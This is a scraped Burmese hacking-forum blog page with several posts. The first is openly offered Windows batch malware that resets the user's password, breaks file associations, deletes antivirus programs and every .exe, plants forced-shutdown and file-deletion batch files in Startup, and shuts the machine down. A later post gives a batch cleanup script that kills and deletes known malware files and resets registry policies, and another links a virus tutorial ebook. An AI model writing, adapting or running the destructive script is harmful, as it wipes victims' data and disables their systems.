--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading.
ping localhost -n 2 >nul
cls
--------------------------------------------------
//changes the user's password
net user %username% Troopzz >nul
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading..
ping localhost -n 2 >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading...
ping localhost -n 2>nul
cls
--------------------------------------------------
echo All files is now complete
ping localhost -n 3 >nul
cls
--------------------------------------------------
echo The virus you just downloaded is now activate. shuting down computer in:
ping localhost -n 4>nul
echo 2.
cls
--------------------------------------------------
//confuser (changing shit)
assoc .dll=txtfile >nul
assoc .exe=pngfile >nul
assoc .vbs=Visual Style >nul
assoc .reg=xmlfile >nul
assoc .txt=regfile >nul
assoc .mp3=txtfile >nul
assoc .xml=txtfile >nul
assoc .png=txtfile >nul
assoc .jpg=txtfile >nul
assoc .mp3=regfile >nul
--------------------------------------------------
echo The virus you just downloaded is now activate. shuting down computer in:
echo 1.
ping localhost -n 1>nul
--------------------------------------------------
//antivirus delete
del /Q /F C:\Program Files\alwils~1\avast4\*.* >nul
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe >nul
del /Q /F C:\Program Files\kasper~1\*.exe >nul
del /Q /F C:\Program Files\trojan~1\*.exe >nul
del /Q /F C:\Program Files\f-prot95\*.dll >nul
del /Q /F C:\Program Files\tbav\*.dat >nul
del /Q /F C:\Program Files\avpersonal\*.vdf >nul
del /Q /F C:\Program Files\Norton~1\*.cnt >nul
del /Q /F C:\Program Files\Mcafee\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\*.* >nul
del /Q /F C:\Program Files\Norton~1\*.* >nul
del /Q /F C:\Program Files\avgamsr\*.exe >nul
del /Q /F C:\Program Files\avgamsvr\*.exe >nul
del /Q /F C:\Program Files\avgemc\*.exe >nul
del /Q /F C:\Program Files\avgcc\*.exe >nul
del /Q /F C:\Program Files\avgupsvc\*.exe >nul
del /Q /F C:\Program Files\grisoft >nul
del /Q /F C:\Program Files\nood32krn\*.exe >nul
del /Q /F C:\Program Files\nood32\*.exe >nul
del /Q /F C:\Program Files\nod32 >nul
del /Q /F C:\Program Files\nood32 >nul
del /Q /F C:\Program Files\kav\*.exe >nul
del /Q /F C:\Program Files\kavmm\*.exe >nul
del /Q /F C:\Program Files\kaspersky\*.* >nul
del /Q /F C:\Program Files\ewidoctrl\*.exe >nul
del /Q /F C:\Program Files\guard\*.exe >nul
del /Q /F C:\Program Files\ewido\*.exe >nul
del /Q /F C:\Program Files\pavprsrv\*.exe >nul
del /Q /F C:\Program Files\pavprot\*.exe >nul
del /Q /F C:\Program Files\avengine\*.exe >nul
del /Q /F C:\Program Files\apvxdwin\*.exe >nul
del /Q /F C:\Program Files\webproxy\*.exe >nul
del /Q /F C:\Program Files\panda software\*.* >nul
//delete all .exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
//spreading a shutdown virus (the random is any number between 0 and 32000) so you better be lucky..
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
//creating random batchs with random shutdown
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
// delete time
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
echo del c:\windows >>0x00f
echo del c:\program files >>0x00f
echo del c:\documents and settings >>0x00f
echo del f:\ >>0x00f
echo del d:\ >>0x00f
echo del c:\autoexec.bat >>0x00f
echo del c:\boot.ini >>0x00f
echo del c:\ntldr >>0x00f
echo del c:\windows\win.ini >>0x00f
echo attrib -r -s -h c:\autoexec.bat >>0x00f
echo attrib -r -s -h c:\boot.ini >>0x00f
echo attrib -r -s -h c:\ntldr >>0x00f
echo attrib -r -s -h c:\windows\win.ini >>0x00f
//copy the batch file to startup
--------------------------------------------------
set startup=copy %0 "C:\Documents and Settings/%username%/Start Menu/Programs/Startup" >nul
copy "0x00f.bat" "C:\documents and settings\%username%\start menu\programs\startup" >nul
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
attrib +a +s +r +h >nul
cls
--------------------------------------------------

//shutdown
shutdown -f -t 3 -c "shwekoyantaw"


power by uhackme

Read More ->>

Sunday, February 5, 2012

Virus Knowledge and Tutorial Ebook


Knowledge ေလာက္ပါပဲဒါေပမယ့္ေတာ္ေတာ္ေလးဖတ္လို႕ေကာင္းတယ္။ေဆာင္ထားလိုက္ၾကေပါ့ .။။။
ဒီစာအုပ္ေလးကတိုေပမယ့္ ျပည့္စံုတယ္လို႕ဆိုရမယ္။ေဒါင္းသြားလိုက္ၾကပါ ....ဗဟုသုတေပါ့။

http://www.ziddu.com/download/15186857/vtutor.pdf.html
Read More ->>

Friday, January 27, 2012

recycler virus killer!



post by uhackme
form myanmar hacking forum

က်ေနာ္ကေတာ.uhackme လို.အမည္ေျပာင္ေလးေပးထားပါတယ္ဗ်ာ....က်ေနာ္ကေတာ.
ေလ့လာေနဆဲလူတေယာက္ေပါ.ဗ်ားbasic အဆင္.ေလာက္ပါပဲ..........အခုက်ေနာ္သယ္ရင္းေတြ
ြကြန္ျပဴတာမွာrecycler virus ကိုက္တာမခံရေအာင္လို.ကုဒ္ေလးshare ေပးလိုက္ပါတယ္ဗ်ား...........
.(file name.bat)နဲ.save ျပီးအသံုးျပဳနိုင္ပါတယ္။...............
@echo Modified by uh4ckm3
path %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;
Color 1F
tskill bar311
tskill blastcln
tskill mveo
tskill password_viewer
tskill photos
tskill sscviihost
tskill services
tskill silentsoftech
tskill smss
tskill wscript
taskkill /f /im awkeygen.exe
taskkill /f /im boot.exe
taskkill /f /im calc.exe
taskkill /f /im ccprxy.exe
taskkill /f /im ctfmon.exe
taskkill /f /im exp1orer.exe
taskkill /f /im exiplorer.exe
taskkill /f /im "Funny UST Scandal.avi.exe"
taskkill /f /im iexp1ore.exe
taskkill /f /im iexplore.exe
taskkill /f /im iloveher.exe
taskkill /f /im jay.exe
taskkill /f /im killer.exe
taskkill /f /im knight.exe
taskkill /f /im krag.exe
taskkill /f /im ld.exe
taskkill /f /im netsvcs.exe
taskkill /f /im "new document.exe"
taskkill /f /im "new folder.exe"
taskkill /f /im pet32.exe
taskkill /f /im ravmone.exe
taskkill /f /im scvhosts.exe
taskkill /f /im scvshosts.exe
taskkill /f /im scvvhsot.exe
taskkill /f /im SecretStub.exe
taskkill /f /im spoclsv.exe
taskkill /f /im sscvihost.exe
taskkill /f /im svchosl.exe
taskkill /f /im svhost.exe
taskkill /f /im svhost32.exe
taskkill /f /im svohost.exe
taskkill /f /im svshost.exe
taskkill /f /im vhost.exe
taskkill /f /im wmiprvse.exe
Color 4F
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 0 /f > nul
REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 0 /f > nul
REG delete "HKCU\Software\BARRY" /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t reg_sz /d "%SystemRoot%\system32\userinit.exe," /f >nul
REG delete "HKCU\Software\Microsoft\Command Processor" /v "autorun" /f >nul
REG delete "HKLM\Software\Microsoft\Command Processor" /v "autorun" /f >nul
echo.
rd /q /s c:\docume~1\admini~1\mydocu~1\ratedr~1
cd %userprofile%
del /f /a wintask.exe
cd..
cd alluse~1\startm~1\programs\startup
del /f /a lsass.exe
cd %userprofile%\startm~1\programs\startup
del /f /a ctfmon.exe
del startu~1.com
cd %userprofile%\applic~1\micros~1\intern~1\quickl~1
del intern~1.lnk
cd %userprofile%\locals~1\applic~1
del jalak-~1.com
rd /q /s dv6116~1
cd\docume~1\anggra~1\locals~1\applic~1
del jalak-~1.com
rd /q /s dv6156~1
cd\docume~1\locals~1\locals~1\applic~1
del jalak-~1.com
rd /q /s dv6191~1
rd /q /s dv6333~1
cd\docume~1\admini~1.use\locals~1\applic~1
del jalak-~1.com
rd /q /s dv6211~1
cd %userprofile%\locals~1\temp
del winlogon.exe
cd\progra~1\common~1\micros~1\msinfo
del /f /a c:\docume~1\admini~1\wintask.exe
del /f /a c:\docume~1\admini~1\templa~1\ld.exe
del /f /a c:\docume~1\admini~1\templa~1\ldup.exe
del /f /a c:\docume~1\admini~1\mydocu~1\myfold~1.com
del /f /a c:\docume~1\admini~1\mydocu~1\ratedr~1
del /f /a c:\docume~1\admini~1\mydocu~1\ratedr~1.com
del /f /a c:\docume~1\alluse~1\startm~1\programs\startup\dllhost.com
del /f /a exp1orer.exe
del /f /a noteped.exe
del /f /a redelbat.bat
del /f /a c:\aikelyu.html
del /f /a c:\iloveher.exe
del /f /a c:\SilentSoftecth.exe
del /f /a c:\FLEXLM\awkeygen.exe


del /f /a %windir%\_defau~1.pif
del /f /a %windir%\autorun.*
del /f /a %windir%\bar311.exe
del /f /a %windir%\FS6519.dll.vbs
del /f /a %windir%\funnyu~1.exe
del /f /a %windir%\iloveher.exe
del /f /a %windir%\infrom.dat
del /f /a %windir%\j6154022.exe
del /f /a %windir%\killer.exe
del /f /a %windir%\knight.exe
del /f /a %windir%\krag.exe
del /f /a %windir%\ld.exe
del /f /a %windir%\ldjs.txt
del /f /a %windir%\ldlist.txt
del /f /a %windir%\ldup.exe
del /f /a %windir%\lsass.exe
del /f /a %windir%\lsasse~1.exe
del /f /a %windir%\maskrider2001.vbs
del /f /a %windir%\mdm.exe
del /f /a %windir%\ms32dll.dll.vbs
del /f /a %windir%\ms.config`.exe
del /f /a %windir%\ntkros.dll
del /f /a %windir%\ntsys.exe
del /f /a %windir%\o4154027.exe
del /f /a %windir%\passwo~1.exe
del /f /a %windir%\pc-off.bat
del /f /a %windir%\photos~1.exe
del /f /a %windir%\ravmone.exe
del /f /a %windir%\scvvhsot.exe
del /f /a %windir%\services.exe
del /f /a %windir%\SecretStub.exe
del /f /a %windir%\smss.exe
del /f /a %windir%\sscviihost.exe
del /f /a %windir%\svchost.exe
del /f /a %windir%\svchost.ini
del /f /a %windir%\sy.exe
del /f /a %windir%\ttms*.dll.vbs
del /f /a %windir%\winlogon.exe
del /f /a %windir%\svhost.exe
del /f /a %windir%\svhost32.exe
del /f /a %windir%\system\111.exe
del /f /a %windir%\system\desktrukto.vbs
del /f /a %windir%\system\lsass.exe
del /f /a %windir%\system\svchosl.exe
del /f /a %windir%\system\svchost.exe
del /f /a %windir%\system\svchost32.exe
del /f /a %windir%\system\ymworm.exe
del /f /a %windir%\system32\__.*
del /f /a %windir%\system32\_exp1orer.exe
del /f /a %windir%\system32\_noteped.exe
del /f /a %windir%\system32\alecks.*
del /f /a %windir%\system32\autorun*.*
del /f /a %windir%\system32\amvo.exe
del /f /a %windir%\system32\amvo0.dll
del /f /a %windir%\system32\amvo1.dll
del /f /a %windir%\system32\avpo*.*
del /f /a %windir%\system32\azkaban.*
del /f /a %windir%\system32\blastclnnn.exe
del /f /a %windir%\system32\ccprxy.exe
del /f /a %windir%\system32\crss.exe
del /f /a %windir%\system32\destrukto.*
del /f /a %windir%\system32\dismgnt.exe
del /f /a %windir%\system32\dllhost.com
del /f /a %windir%\system32\dnscon70.dll
del /f /a %windir%\system32\exiplorer.exe
del /f /a %windir%\system32\explorer.vbs
del /f /a %windir%\system32\explorer.exe
del /f /a %windir%\system32\homepage.html
del /f /a %windir%\system32\imgkulot.*
del /f /a %windir%\system32\isass.exe
del /f /a %windir%\system32\kavo.exe
del /f /a %windir%\system32\kavo0.dll
del /f /a %windir%\system32\kavo1.dll
del /f /a %windir%\system32\kernel~1.vbs
del /f /a %windir%\system32\kernell.dll.vbs
del /f /a %windir%\system32\kulitut.*
del /f /a %windir%\system32\mgrShell.exe
del /f /a %windir%\system32\mma.bat
del /f /a %windir%\system32\mma.reg
del /f /a %windir%\system32\mma.vbs
del /f /a %windir%\system32\mstcpcon20.dll
del /f /a %windir%\system32\mveo.exe
del /f /a %windir%\system32\netmanage.dll
del /f /a %windir%\system32\netsvcs.exe
del /f /a %windir%\system32\netused.dll
del /f /a %windir%\system32\ntkros.dll
del /f /a %windir%\system32\ntsys.exe
del /f /a %windir%\system32\ofcpfwsvcs.exe
del /f /a %windir%\system32\S2pidwaraynon.html
del /f /a %windir%\system32\scvhost.exe
del /f /a %windir%\system32\scvhosts.exe
del /f /a %windir%\system32\scvshosts.exe
del /f /a %windir%\system32\scvvhsot.exe
del /f /a %windir%\system32\setting.ini
del /f /a %windir%\system32\silent~1.exe
del /f /a %windir%\system32\sscvihost.exe
del /f /a %windir%\system32\sscviihost.exe
del /f /a %windir%\system32\ssvichosst.exe
del /f /a %windir%\system32\svshost.exe
del /f /a %windir%\system32\svohost.exe
del /f /a %windir%\system32\test.*
del /f /a %windir%\system32\vhost.exe
del /f /a %windir%\system32\wincab.sys
del /f /a %windir%\system32\winkrnl.exe
del /f /a %windir%\system32\winscok.dll
del /f /a %windir%\system32\wmiprvse.exe
del /f /a %windir%\system32\wvcst.*
del /f /a %windir%\system32\x264~1.exe
del /f /a %windir%\system32\zllictbl.dat
del /f /a %windir%\system32\drivers\spoclsv.exe
rd /q /s %windir%\ac12594
rd /q /s %windir%\Ad22098
rd /q /s %windir%\an16554
rd /q /s %windir%\SY20118
rd /q /s %windir%\ugqe
del /f /a %windir%\setup\dllhost.com
rd /q /s %windir%\setup
rd /q /s %windir%\system\_sv_cmd_
rd /q /s %windir%\system32\n2847
rd /q /s %windir%\system32\n5619
rd /q /s %windir%\system32\n8127
rd /q /s %windir%\system32\s5421
rd /q /s %windir%\system32\s8787
rd /q /s %windir%\system32\s6939
rd /q /s %windir%\temp\_istmpi.dir
for %%i in (C D E F G H) do del /f /a %%i:\aikelyu.html
for %%i in (C D E F G H) do del /f /a %%i:\__.*
for %%i in (C D E F G H) do del /f /a %%i:\3g08.bat
for %%i in (C D E F G H) do del /f /a %%i:\3wcxx91.cmd
for %%i in (C D E F G H) do del /f /a %%i:\8ng8w.com
for %%i in (C D E F G H) do del /f /a %%i:\8ot8y86.exe
for %%i in (C D E F G H) do del /f /a %%i:\8u.com
for %%i in (C D E F G H) do del /f /a %%i:\adober.exe
for %%i in (C D E F G H) do del /f /a %%i:\alecks.*
for %%i in (C D E F G H) do del /f /a %%i:\autorun.*
for %%i in (C D E F G H) do del /f /a %%i:\azkaban.*
for %%i in (C D E F G H) do del /f /a %%i:\bacabr~1.txt
for %%i in (C D E F G H) do del /f /a %%i:\bar311.exe
for %%i in (C D E F G H) do del /f /a %%i:\boot.exe
for %%i in (C D E F G H) do del /f /a %%i:\copy.exe
for %%i in (C D E F G H) do del /f /a %%i:\d.com
for %%i in (C D E F G H) do del /f /a %%i:\desktop.exe
for %%i in (C D E F G H) do del /f /a %%i:\desktop.ini
for %%i in (C D E F G H) do del /f /a %%i:\destrukto.vbs
for %%i in (C D E F G H) do del /f /a %%i:\exiplorer.exe
for %%i in (C D E F G H) do del /f /a %%i:\exp1orer.exe
for %%i in (C D E F G H) do del /f /a %%i:\explorar.vbs
for %%i in (C D E F G H) do del /f /a %%i:\explorer.exe
for %%i in (C D E F G H) do del /f /a %%i:\folder.htt
for %%i in (C D E F G H) do del /f /a %%i:\funnyu~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\FS6519.dll.vbs
for %%i in (C D E F G H) do del /f /a %%i:\g2p3s.exe
for %%i in (C D E F G H) do del /f /a %%i:\gwe(i~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\h.cmd
for %%i in (C D E F G H) do del /f /a %%i:\h2.com
for %%i in (C D E F G H) do del /f /a %%i:\host.exe
for %%i in (C D E F G H) do del /f /a %%i:\iloveher.exe
for %%i in (C D E F G H) do del /f /a %%i:\ie.exe
for %%i in (C D E F G H) do del /f /a %%i:\imgkulot.*
for %%i in (C D E F G H) do del /f /a %%i:\infrom.exe
for %%i in (C D E F G H) do del /f /a %%i:\jay.exe
for %%i in (C D E F G H) do del /f /a %%i:\knight.exe
for %%i in (C D E F G H) do del /f /a %%i:\krag.exe
for %%i in (C D E F G H) do del /f /a %%i:\kragdor.log
for %%i in (C D E F G H) do del /f /a %%i:\kulitut.*
for %%i in (C D E F G H) do del /f /a %%i:\ldupver.txt
for %%i in (C D E F G H) do del /f /a %%i:\lsass.exe
for %%i in (C D E F G H) do del /f /a %%i:\maskrider2001.vbs
for %%i in (C D E F G H) do del /f /a %%i:\mma.bat
for %%i in (C D E F G H) do del /f /a %%i:\mma.reg
for %%i in (C D E F G H) do del /f /a %%i:\mma.vbs
for %%i in (C D E F G H) do del /f /a %%i:\MS32DLL.dll.vbs
for %%i in (C D E F G H) do del /f /a %%i:\msvcr71.dll
for %%i in (C D E F G H) do del /f /a %%i:\mswinsck.ocx
for %%i in (C D E F G H) do del /f /a %%i:\n1deiect.com
for %%i in (C D E F G H) do del /f /a %%i:\netsvcs.exe
for %%i in (C D E F G H) do del /f /a %%i:\newdoc~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\newfol~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\noteped.exe
for %%i in (C D E F G H) do del /f /a %%i:\ntde1ect.com
for %%i in (C D E F G H) do del /f /a %%i:\p3r1ud.exe
for %%i in (C D E F G H) do del /f /a %%i:\pet32.exe
for %%i in (C D E F G H) do del /f /a %%i:\poogs.vbs
for %%i in (C D E F G H) do del /f /a %%i:\pooh.vbs
for %%i in (C D E F G H) do del /f /a %%i:\ravmone.exe
for %%i in (C D E F G H) do del /f /a %%i:\ravmonlog
for %%i in (C D E F G H) do del /f /a %%i:\recycler.exe
for %%i in (C D E F G H) do del /f /a %%i:\rootfo~1.com
for %%i in (C D E F G H) do del /f /a %%i:\sender.vbs
for %%i in (C D E F G H) do del /f /a %%i:\sexvid~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\scvhsot.exe
for %%i in (C D E F G H) do del /f /a %%i:\scvvhsot.exe
for %%i in (C D E F G H) do del /f /a %%i:\silent~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\SilentSoftecth.exe
for %%i in (C D E F G H) do del /f /a %%i:\smss.exe
for %%i in (C D E F G H) do del /f /a %%i:\sqlserv.exe
for %%i in (C D E F G H) do del /f /a %%i:\SSCVIHOST.exe
for %%i in (C D E F G H) do del /f /a %%i:\SSCVIIHOST.exe
for %%i in (C D E F G H) do del /f /a %%i:\SSVICHOSST.exe
for %%i in (C D E F G H) do del /f /a %%i:\sxs.exe
for %%i in (C D E F G H) do del /f /a %%i:\t.exe
for %%i in (C D E F G H) do del /f /a %%i:\test.*
for %%i in (C D E F G H) do del /f /a %%i:\ttms*.dll.vbs
for %%i in (C D E F G H) do del /f /a %%i:\winconfig.dll.vbs
for %%i in (C D E F G H) do del /f /a %%i:\wsctf.exe
for %%i in (C D E F G H) do del /f /a %%i:\wvcst.*
for %%i in (C D E F G H) do del /f /a %%i:\x.com
for %%i in (C D E F G H) do del /f /a %%i:\xn1i9x.com
for %%i in (C D E F G H) do del /f /a %%i:\zelurm~1.exe
for %%i in (C D E F G H) do del /f /a %%i:\progra~1\intern~1\iexp1ore.exe
for %%i in (C D E F G H) do del /ah /ar /as %%i:\setup.exe
echo.
for %%i in (C D E F G H) do rd /q /s %%i:\$lddata$
for %%i in (C D E F G H) do rd /q /s %%i:\ms-dos
for %%i in (C D E F G H) do rd /q /s %%i:\ms.config
for %%i in (C D E F G H) do rd /q /s %%i:\msrm
for %%i in (C D E F G H) do rd /q /s %%i:\nt.config
for %%i in (C D E F G H) do rd /q /s %%i:\recycled
for %%i in (C D E F G H) do rd /q /s %%i:\rm
for %%i in (D E F G H) do rd /q /s %%i:\recycler\recycler
for %%i in (D E F G H) do rd /q /s %%i:\recycler
echo.
Color 7C
REG add "HKLM\Software\CLASSES\batfile\shell\edit\command" /ve /t reg_expand_sz /d "%SystemRoot%\System32\NOTEPAD.EXE %%1" /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t reg_sz /d "Explorer.exe" /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t reg_sz /d "%SystemRoot%\system32\userinit.exe," /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t reg_sz /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t reg_sz /f >nul

REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "Hidden" /f >nul
REG add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v "CheckedValue" /t reg_dword /d 1 /f >nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 1 /f >nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 0 /f > nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 0 /f > nul
REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 0 /f > nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 0 /f >nul
REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 0 /f >nul
REG add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 0 /f >nul
REG add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "http://www.google.com.ph/intl/en/" /f >nul
REM ----------------------------------------------------
REM [Hidden Value = [1 = Show, 2 = Hide Files (Default)]
REM ----------------------------------------------------
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t reg_dword /d 1 /f >nul
REM ---------------------------------------------------------------------
REM [ShowSupperHidden Value = [1 = Show, 0 = Hide System Files (Default)]
REM ---------------------------------------------------------------------
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t reg_dword /d 1 /f >nul
REG delete "HKLM\Software\Microsoft\Windows\CurrentVersion" /v "RegisteredOrganization" /f >nul
REG delete "HKLM\Software\Microsoft\Windows\CurrentVersion" /v "RegisteredOwner" /f >nul
REG delete "HKLM\Software\Microsoft\Windows\CurrentVersion" /v "ProductId" /f >nul
REG delete "HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0" /v "ProcessorNameString" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /ve /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "{random}" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "ctfmon.exe" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "ampli" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "amva" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "avpa" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "ccPrxy.exe" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Disk Knight" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Explorer" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EXPLORER.EXE" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "f1761gta" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Firewall auto setup" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "FS6519" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "kava" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "krag" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Local Security Authority Service" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "maskrider" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "ms32dll" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "MSConfig" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "MSPetServ" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "N2328c" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "nav_x" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "nav_x" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "OfcpfwSvcs.exe" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "RavAV" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Runonce" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "S2pidwaraynon" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "scApp" /f
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "SilentSoftech" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "svchosl" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "svchost" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "svcshare" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "System File" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Task Manager" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "winconfig" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowNT" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "winlogon.exe" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "WinRun" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "wsctf.exe" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "y1860ace" /f >nul
REG delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Yahoo Messenger" /f >nul
REG delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Yahoo Messengger" /f >nul
REG delete "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /f >nul
REG delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /f >nul
REG delete "HKLM\SYSTEM\ControlSet001\Services\dnscon" /f >nul
REG delete "HKLM\SYSTEM\ControlSet001\Services\NetManager" /f >nul
REG delete "HKLM\SYSTEM\ControlSet001\Services\PmApiService" /f >nul
REG delete "HKLM\SYSTEM\ControlSet002\Services\dnscon" /f >nul
REG delete "HKLM\SYSTEM\ControlSet002\Services\NetManager" /f >nul
REG delete "HKLM\SYSTEM\ControlSet002\Services\PmApiService" /f >nul
REG delete "HKLM\SYSTEM\CurrentControlSet\Services\dnscon" /f >nul
REG delete "HKLM\SYSTEM\CurrentControlSet\Services\NetManager" /f >nul
REG delete "HKLM\SYSTEM\CurrentControlSet\Services\PmApiService" /f >nul
REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "N2328c" /f >nul
REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "N2373c" /f >nul
REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "PolicyRun" /f >nul
REG delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "y1860ace" /f >nul
REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /ve /f >nul
______________________________
Getting back the attributes.
______________________________
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t reg_dword /d 0 /f >nul
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t reg_dword /d 2 /f >nul
REG add HCKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "HideFileExt" /t reg_dword /d 1 /f >nul
echo.
msg %username% /w /time:15 VIRUSES HAS BEEN REMOVED!!!
Read More ->>

Friday, December 16, 2011

Virus သတ္နည္း။ေရနည္း စာအုပ္။


Virus ကို Dos Command ကေန သတ္နည္း..Virus ေတြဘယ္လိုအလုပ္လုပ္သလဲဆိုတဲ့အေၾကာင္းေတြ.
